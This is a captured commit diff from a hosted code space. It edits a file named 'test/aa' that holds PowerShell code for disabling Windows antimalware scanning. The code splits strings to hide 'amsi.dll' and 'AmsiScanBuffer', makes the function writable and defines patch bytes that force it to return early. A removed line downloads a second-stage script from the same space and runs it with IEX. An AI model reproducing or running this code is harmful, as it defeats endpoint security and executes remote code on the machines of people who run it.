Spaces:
Runtime error
Runtime error
Update test/aa
Browse files
test/aa
CHANGED
@@ -24,5 +24,4 @@ $LoadLibrary = [Win32]::LoadLibrary("am" + "si.dll")
|
|
24 |
$Address = [Win32]::GetProcAddress($LoadLibrary, "Amsi" + "Scan" + "Buffer")
|
25 |
$p = 0
|
26 |
[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
|
27 |
-
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
|
28 |
-
IEX(New-Object Net.WebClient).DownloadString('https://huggingface.co/spaces/enotkrutoy/gggg/raw/main/test/bb')
|
|
|
24 |
$Address = [Win32]::GetProcAddress($LoadLibrary, "Amsi" + "Scan" + "Buffer")
|
25 |
$p = 0
|
26 |
[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
|
27 |
+
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
|
|